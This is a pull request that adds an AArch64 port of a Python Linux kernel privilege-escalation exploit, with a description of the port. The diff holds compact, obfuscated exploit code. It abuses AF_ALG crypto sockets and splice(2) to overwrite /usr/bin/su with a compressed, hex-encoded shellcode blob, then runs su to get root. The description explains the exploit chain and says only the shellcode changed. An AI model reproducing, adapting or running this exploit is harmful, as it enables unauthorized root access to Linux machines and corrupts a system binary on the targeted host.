### PR TITLE
Add aarch64 port

### DIFF
--- a/copy_fail_exp_aarch64.py
+++ b/copy_fail_exp_aarch64.py
@@ -1,0 +1,10 @@
+#!/usr/bin/env python3
+import os as g,zlib,socket as s
+def d(x):return bytes.fromhex(x)
+def c(f,t,c):
+ a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
+ try:u.recv(8+t)
+ except:0
+f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("789cab77f5716362646480012686ed0c205e05830398efc080091c182c18603a40342b9a2c32bd06ca83d10c023046c3250fa1864b40fd578086083002f94c40bc421a2a06627343d8fa499979fac5190c00436c1587"))
+while i<len(e):c(f,i,e[i:i+4]);i+=4
+g.system("su")


### PR DESCRIPTION
# Porting `copy_fail_exp.py` from AMD64 to AArch64

## Overview

This exploit abuses a Linux kernel vulnerability in the XFRM (IPsec transform)
subsystem combined with `splice(2)` to achieve an arbitrary write primitive,
which it uses to overwrite `/usr/bin/su` with a custom shellcode payload. The
final call to `os.system("su")` then executes the overwritten binary to achieve
privilege escalation.

## What Stayed the Same

The entire exploit framework is architecture-agnostic because it operates
entirely through Linux kernel syscalls and the Python standard library:

- The XFRM socket setup (AF_ALG socket, `authencesn(hmac(sha256),cbc(aes))`
  algorithm binding, and the sequence of `setsockopt` calls at level 279)
- The `sendmsg` payload structure used to trigger the kernel vulnerability
- The `os.pipe()` / `os.splice()` write-what-where chain that performs the
  actual overwrite of `/usr/bin/su`
- The outer loop that walks the decompressed shellcode in 4-byte chunks and
  writes each chunk at the correct file offset

## What Changed

The only change between the two versions is the embedded shellcode payload —
the zlib-compressed, hex-encoded blob passed to `zlib.decompress`. 

The AMD64 version contains x86-64 machine code. When decompressed it produces
a binary blob written into `/usr/bin/su` that runs correctly on x86-64
processors.

The AArch64 version replaces that blob with equivalent AArch64 (ARM64) machine
code. The decompressed payload is slightly smaller than the AMD64 version,
which is consistent with AArch64's fixed-width 32-bit instruction encoding
being more compact than the equivalent x86-64 sequence for this particular
payload.

## Porting Process

1. The AMD64 shellcode payload was identified as the only architecture-specific
   component in the exploit.
2. An equivalent shellcode was written (or sourced) for the AArch64 instruction
   set, producing the same end effect when written into and executed from
   `/usr/bin/su`.
3. The new AArch64 shellcode binary was zlib-compressed and hex-encoded to
   produce the replacement payload string.
4. The hex string in the `zlib.decompress(d(...))` call was substituted with
   the AArch64-compiled payload. No other lines in the script were modified.

## Summary

The port was purely a shellcode swap. All exploit plumbing above the payload
layer is portable Python that drives kernel interfaces available on both
architectures without modification.